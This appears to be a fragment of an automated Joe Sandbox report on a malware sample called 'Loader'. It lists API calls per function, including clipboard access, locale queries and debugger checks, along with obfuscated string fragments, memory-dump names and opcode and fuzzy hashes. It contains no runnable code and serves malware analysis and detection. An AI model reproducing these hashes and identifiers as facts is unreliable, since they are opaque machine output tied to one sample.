                                                                                                  • RtlAllocateHeap.NTDLL(?,00000000,?,?,004088C0,DED9EF53), ref: 0043BB20
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: c216a67e57b3405da71f45c1bfe1bc1fecfc42553cfdfabce731ac237666b504
                                                                                                  • Instruction ID: 388a8f3e4fedbc6b1fb826c6b697f44c03bb29f784dc96c54f45adbfa6eafd7a
                                                                                                  • Opcode Fuzzy Hash: c216a67e57b3405da71f45c1bfe1bc1fecfc42553cfdfabce731ac237666b504
                                                                                                  • Instruction Fuzzy Hash: 4AC09B31049121FBC5106B15FC05FC67F54DF55355F050495B404670F5C760AC41C6D8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HyN$!/$"5$#T'Z$2QB$A*$Y`=f$bc$bu$cPeV$e,g2$e\fb$gd$lino$th$HN$LR
                                                                                                  • API String ID: 0-807189241
                                                                                                  • Opcode ID: 2d4e2d35a814bced3b3636d7d8501cbb3f55474373eb71028de02c5461902543
                                                                                                  • Instruction ID: 57374753a14dd50accee7fbad0f06b7c84733402f04cc10fcb83c99e163f5e09
                                                                                                  • Opcode Fuzzy Hash: 2d4e2d35a814bced3b3636d7d8501cbb3f55474373eb71028de02c5461902543
                                                                                                  • Instruction Fuzzy Hash: B39260B560C3918AD334CF28D8417ABBBF1FBD2300F41892DD4D99B251D7799A46CB8A
                                                                                                  APIs
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?), ref: 0042799E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                  • String ID: .C-]$5KVA$SV[Q$Y^\`$`}B$p$r}B
                                                                                                  • API String ID: 237503144-3694369797
                                                                                                  • Opcode ID: 0dd9e538bd84b710ec81afcd3d73be0cf9762a772466ced3b5c5d906055036bd
                                                                                                  • Instruction ID: f8153a2963346a3c4f8f0f3999a241bc14663e1250d6f919a9210c5b318ab86f
                                                                                                  • Opcode Fuzzy Hash: 0dd9e538bd84b710ec81afcd3d73be0cf9762a772466ced3b5c5d906055036bd
                                                                                                  • Instruction Fuzzy Hash: E022F1B5A08351CFD3108F29E88072BB7E1EF8B314F56897DE495A7391D735A804CB8A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: )|8r$2h;n$4`2f$6\1R$=d1z$BU$O$u-=)$rB
                                                                                                  • API String ID: 0-3561239838
                                                                                                  • Opcode ID: 976204580b75eea79d519b1cceeec9299caff96ec0e08137251f8d38ce9bb3d1
                                                                                                  • Instruction ID: 44659da7a58bffa910c0fd2fd1991b5534d8bb96e5934085409a7f6150a94b63
                                                                                                  • Opcode Fuzzy Hash: 976204580b75eea79d519b1cceeec9299caff96ec0e08137251f8d38ce9bb3d1
                                                                                                  • Instruction Fuzzy Hash: 7A12F0B5B083508BD7249F28E84176BB7E1FBC6314F45893DE48997341EB78A901CB8B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "$2106D7020EE20555E1B71982A10B646A$>?$ARsp$IFBI$QBMB$g
                                                                                                  • API String ID: 0-1850934352
                                                                                                  • Opcode ID: 39a52745a593c21182c18f0015e1fe8be405a908f18c0e3ae1eed51a1b0b8c26
                                                                                                  • Instruction ID: 4ed9560b1f06c9358b6dfc473aff5ca0cce812477f736f0191d570df79638fa9
                                                                                                  • Opcode Fuzzy Hash: 39a52745a593c21182c18f0015e1fe8be405a908f18c0e3ae1eed51a1b0b8c26
                                                                                                  • Instruction Fuzzy Hash: B5C1147160C3408BD718CF25D89166FBBE2EBD1308F18892EF5D59B381DA39C906CB5A
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Clipboard$CloseDataGlobalLockOpen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1494355150-0
                                                                                                  • Opcode ID: bf2b881bf281171c9d80926ab815c048d09764669e64f39dfbaddd0b92a499c4
                                                                                                  • Instruction ID: 10706e52b29aa6f4c2fc55eeb0f9a6ed81c134b4e532b55050d0803d3f56f37e
                                                                                                  • Opcode Fuzzy Hash: bf2b881bf281171c9d80926ab815c048d09764669e64f39dfbaddd0b92a499c4
                                                                                                  • Instruction Fuzzy Hash: B241C27150C7828EC310AF7C8A4822FBFE06F96324F044A2EF4D5962D2D6B88549D797
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: O$(vt$(]$*+$,[B$L&$rsp
                                                                                                  • API String ID: 0-3823200753
                                                                                                  • Opcode ID: 6b27d569a1358946890cb5d852d2de414d2233efdbbfc09ecd21cecc045567cc
                                                                                                  • Instruction ID: 55c153b773319b370570fe87994eaf7fc4aa01ada6c36f5296d3a0b47ba10f96
                                                                                                  • Opcode Fuzzy Hash: 6b27d569a1358946890cb5d852d2de414d2233efdbbfc09ecd21cecc045567cc
                                                                                                  • Instruction Fuzzy Hash: A9810EB598D7808FE320DF65818038EBAE1FB92304F54A91CE6E96B225D7B98105CF47
                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,00D4AB6D,?,00000000), ref: 00D4B250
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,00D4AB6D,?,00000000), ref: 00D4B279
                                                                                                  • GetACP.KERNEL32(?,?,00D4AB6D,?,00000000), ref: 00D4B28E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID: ACP$OCP
                                                                                                  • API String ID: 2299586839-711371036
                                                                                                  • Opcode ID: 73fbb39909b10f7572f3357f9be20b62d0dd7cb0130b50acfa3fd77098ad2c1f
                                                                                                  • Instruction ID: 12211e599adba2b564d31649dd473cea1bd023f344e81f659e69991d4562734d
                                                                                                  • Opcode Fuzzy Hash: 73fbb39909b10f7572f3357f9be20b62d0dd7cb0130b50acfa3fd77098ad2c1f
                                                                                                  • Instruction Fuzzy Hash: 3221B8227002009BDB348F65C981B9F77A6EF74B74B5E4526E949DB214E772DE40C374
                                                                                                  APIs
                                                                                                    • Part of subcall function 0043D760: LdrInitializeThunk.NTDLL(0044095A,00000002,00000018,?,?,00000018,?,?,?), ref: 0043D78E
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00419F6A
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00419FEB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary$InitializeThunk
                                                                                                  • String ID: NO$Wuv7
                                                                                                  • API String ID: 764372645-2251228920
                                                                                                  • Opcode ID: ddb277853f3d7b4b4c086d3fc3affa3f2e505fe11e886f0c5a8c988f89603a25
                                                                                                  • Instruction ID: 8f2d08c20d0872089e81bf27488a285f42f51548798f678bc05426a8657250db
                                                                                                  • Opcode Fuzzy Hash: ddb277853f3d7b4b4c086d3fc3affa3f2e505fe11e886f0c5a8c988f89603a25
                                                                                                  • Instruction Fuzzy Hash: E482E3347493409FE7248B64C8847ABBBE2ABD6310F28842DE4C587396D7799C91CB5B
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D4594A: GetLastError.KERNEL32(00000000,?,00D47CCD), ref: 00D4594E
                                                                                                    • Part of subcall function 00D4594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D41F93), ref: 00D459F0
                                                                                                  • GetUserDefaultLCID.KERNEL32 ref: 00D4AB3F
                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00D4AB7D
                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00D4AB90
                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00D4ABD8
                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00D4ABF3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                  • String ID:
                                                                                                  • API String ID: 415426439-0
                                                                                                  • Opcode ID: 5aa65f54b1953f985d331977e8eb3d5ae17fff187eac576dc34efcdd343f705f
                                                                                                  • Instruction ID: e26e11fe08b71ad3647ddab8a869fb332a512916b52f0625e03c7b66b26e2897
                                                                                                  • Opcode Fuzzy Hash: 5aa65f54b1953f985d331977e8eb3d5ae17fff187eac576dc34efcdd343f705f
                                                                                                  • Instruction Fuzzy Hash: 68516F71A40209AFDB10DFA9CC85ABE77B9EF14701F084569E941EB191E770DA44CB72
                                                                                                  APIs
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,D797D5F1), ref: 00423B72
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,D797D5F1,D797D5F1), ref: 00423BE2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                  • String ID: qx$=B
                                                                                                  • API String ID: 237503144-3206994183
                                                                                                  • Opcode ID: 91eb9785edd60ac935ae081d44f8ca4532ee0298940d38b6b433524e14b33d7f
                                                                                                  • Instruction ID: e37f02667e8c6cc61e9b02e0e6b3364f21dedfd4e9ad58bcad86f01aad785cec
                                                                                                  • Opcode Fuzzy Hash: 91eb9785edd60ac935ae081d44f8ca4532ee0298940d38b6b433524e14b33d7f
                                                                                                  • Instruction Fuzzy Hash: 138124B5A003298FEB10CFA4DC8179EBBB1FB45710F154129E949AB282D77599068BD1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "$>?$ARsp$IFBI$QBMB
                                                                                                  • API String ID: 0-176169714
                                                                                                  • Opcode ID: 272e3c3baf02b27a57576c6a0b51546635e96302ce9dfff9207d5c5776c69f41
                                                                                                  • Instruction ID: 8534c08d75fc9a11dcd13b64fe8bd195b731931e742b428b1880d5704ac37dfc
                                                                                                  • Opcode Fuzzy Hash: 272e3c3baf02b27a57576c6a0b51546635e96302ce9dfff9207d5c5776c69f41
                                                                                                  • Instruction Fuzzy Hash: 4891047164C3408BD718CF65D89266FBBE2EBD1308F14882DF5D59B381DA3989068B5A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                                  • Instruction ID: 9e6a83295ab796a3278f1d02f71d01fb70d87e40b0c787915c00f6039d8409a4
                                                                                                  • Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                                  • Instruction Fuzzy Hash: D2020BB1E012199BDB14CFADD8806AEFBF1FF48314F298269E515E7341D731AA458BA0
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00D39A7F
                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00D39B4B
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D39B64
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00D39B6E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 254469556-0
                                                                                                  • Opcode ID: 40baa707e00af431826123cbb8908d0f484746716394040289c985218bfbd293
                                                                                                  • Instruction ID: 33e727686362e96c2399b76567f4c31698e8b41c058c68c9a0c3e1d6d1403421
                                                                                                  • Opcode Fuzzy Hash: 40baa707e00af431826123cbb8908d0f484746716394040289c985218bfbd293
                                                                                                  • Instruction Fuzzy Hash: 4631F775D053189BDB21EFA4D9497CDBBB8AF08300F1041EAE40CAB250EBB09B84CF55
                                                                                                  APIs
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 004281DE
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0042823F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                  • String ID: 67
                                                                                                  • API String ID: 237503144-1886922373
                                                                                                  • Opcode ID: edf6b4cb604ab90fb683270a59e974a061272f8b0b8f812bf9ce1b76b24096c3
                                                                                                  • Instruction ID: 4f532411486c9b8f9b2e78a8e8c76ab4905e6047a2eafc4a656dd5c5ee150ec6
                                                                                                  • Opcode Fuzzy Hash: edf6b4cb604ab90fb683270a59e974a061272f8b0b8f812bf9ce1b76b24096c3
                                                                                                  • Instruction Fuzzy Hash: C0D1FF716083218FD720DF28D851B6FB7E2EFC5314F05892DE9999B381E7B49505CB86
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: O$[$%$_Y
                                                                                                  • API String ID: 0-3385313786
                                                                                                  • Opcode ID: ac41676442f33c010beadfc2570ddbdad94acfdb7952ab79d2ce312c1e286e63
                                                                                                  • Instruction ID: 539130e2fe6c279b5d1668b9563a0a45e25c412c29af1c9c24e19c64180b8814
                                                                                                  • Opcode Fuzzy Hash: ac41676442f33c010beadfc2570ddbdad94acfdb7952ab79d2ce312c1e286e63
                                                                                                  • Instruction Fuzzy Hash: 999124B2A083508FD314DF68D88176BB7E2AF95304F44896EF5D18B391DB78D841CB4A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ddg$[)^+$f-./
                                                                                                  • API String ID: 0-1799054822
                                                                                                  • Opcode ID: 47f42eaa36760ffd118ac33e81c4a6798d9596c72952d786d850ec147c6d4cf5
                                                                                                  • Instruction ID: 046b2fc63c0d4aa5a93169ad51a43081532c3a98a5611b0ee8d7328c42d2e221
                                                                                                  • Opcode Fuzzy Hash: 47f42eaa36760ffd118ac33e81c4a6798d9596c72952d786d850ec147c6d4cf5
                                                                                                  • Instruction Fuzzy Hash: EF5157B6A193518BC724CF25C8806A7B7F1EFC6304F08996DE4D68B345E3788844CB97
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: 4$PLR3
                                                                                                  • API String ID: 2994545307-2679654426
                                                                                                  • Opcode ID: 5655b783f330bb172fe5b08d09121a5b6246a8f5e11567de392eee1e4622143f
                                                                                                  • Instruction ID: cdfa4fbf63a1801dcabfa5c7f8807d1824bfd1031776aa278281fc0d33c7e13c
                                                                                                  • Opcode Fuzzy Hash: 5655b783f330bb172fe5b08d09121a5b6246a8f5e11567de392eee1e4622143f
                                                                                                  • Instruction Fuzzy Hash: E02215346087808FD7248F24D850BBB77E1FB9B310F18896DD4C597292DB399C82CB6A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: GHDJ$|LNN
                                                                                                  • API String ID: 0-733165312
                                                                                                  • Opcode ID: 8c8c112136867d60a8576ab2365e943441fe6a948ea8b1ab56cd9cf140af17d4
                                                                                                  • Instruction ID: 72ed009128d90da50dadcb193f8a5ec673ac0b0668e03d39c755bc82ac5c33f0
                                                                                                  • Opcode Fuzzy Hash: 8c8c112136867d60a8576ab2365e943441fe6a948ea8b1ab56cd9cf140af17d4
                                                                                                  • Instruction Fuzzy Hash: 3642567490C3808FC721CF25C8507AFBBE1AF96314F088A6EE8E45B392D7398945CB56
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: XY[[$f
                                                                                                  • API String ID: 2994545307-1304488634
                                                                                                  • Opcode ID: 8b6af7a450bdba0e8ad26c4e6cde6c98647c70c98989107a61684112c88b0e78
                                                                                                  • Instruction ID: 43840dbcf4a271d2a311789e27b8b66ce221401c3177c6d05467729440bade9e
                                                                                                  • Opcode Fuzzy Hash: 8b6af7a450bdba0e8ad26c4e6cde6c98647c70c98989107a61684112c88b0e78
                                                                                                  • Instruction Fuzzy Hash: E232E5756083118FD314CF28C8D066BBBE2ABC9314F299A2DE8D5A7391D735EC42CB56
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: KoB$`iB
                                                                                                  • API String ID: 0-1268468544
                                                                                                  • Opcode ID: 00c8c42079eaf4153518fa87ed543341b83f5a89c3c8fa4b81607d57eeddeb50
                                                                                                  • Instruction ID: 9bfe88775f543072fd87395ee7d4488e25e8c221d298f2961d90f22c548be83a
                                                                                                  • Opcode Fuzzy Hash: 00c8c42079eaf4153518fa87ed543341b83f5a89c3c8fa4b81607d57eeddeb50
                                                                                                  • Instruction Fuzzy Hash: F21236B16083958FC7149F24E88136BBBE1AB9A304F45487EE5C587382E739D905CB5B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: bc$ga
                                                                                                  • API String ID: 0-2897819843
                                                                                                  • Opcode ID: 424015a04b5d175fef3fcc407ccffc81cc4a4015887686ab829d6f03997564ef
                                                                                                  • Instruction ID: 126c6bd931be9c77923639ce3e6ecdb1d9d872c8666d12bea14f65941f7b5928
                                                                                                  • Opcode Fuzzy Hash: 424015a04b5d175fef3fcc407ccffc81cc4a4015887686ab829d6f03997564ef
                                                                                                  • Instruction Fuzzy Hash: 847122B16083418BD714CF25C8923B7B7E1EF9A304F18986DE4C19B391E778D842C79A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: D]+\
                                                                                                  • API String ID: 0-1174097187
                                                                                                  • Opcode ID: 4392805e219c8036b618201ee3faf44ddfbd641700b415b0ed0d2039577928ad
                                                                                                  • Instruction ID: 7bed23d118a194cd35543d81d6ef8152e0d9db4ce7c7b9418cb85a93cb0a90ca
                                                                                                  • Opcode Fuzzy Hash: 4392805e219c8036b618201ee3faf44ddfbd641700b415b0ed0d2039577928ad
                                                                                                  • Instruction Fuzzy Hash: 65522579A00215DBDB148F64EC426FB77B1FF8A314F29402EE841A7391E739AD51CB98
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: G)
                                                                                                  • API String ID: 0-3159577425
                                                                                                  • Opcode ID: 4d4c93a943bb9e5628ef04f7d660ed5e209d9d36a32a9237fb0ec7ff85396e54
